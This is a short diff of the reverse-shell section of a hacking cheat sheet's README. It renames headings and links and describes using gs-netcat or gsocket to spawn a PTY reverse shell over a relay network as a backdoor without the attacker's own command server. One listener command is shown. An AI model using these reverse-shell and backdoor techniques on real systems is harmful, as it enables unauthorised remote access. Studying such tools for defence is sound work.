hackerschoice/thc-tips-tricks-hacks-cheat-sheet/README.md

 ```

 ---
-<a id="reverse"></a>
+<a id="reverse-shell"></a>
-## 5. Reverse Shells
+## 5. Reverse Shell / Dumb Shell
-<a id="rswg-anchor"></a>
+<a id="reverse-shell-gs-netcat"></a>
 **5.i.a.
 Reverse shell with gs-netcat**

-Use [gs-netcat](https://github.com/hackerschoice/gsocket).
+Use [gsocket deploy](https://gsocket.io/deploy).
 It spawns a fully functioning PTY reverse shell and using the Global Socket Relay network.
 It uses 'password hashes' instead of IP addresses to connect.
 This means that you do not need to run your own Command & Control server for the backdoor to connect back to.
 If netcat is a swiss army knife than gs-netcat is a german battle axe :>

 ```sh
 gs-netcat -s MySecret -l -i    # Host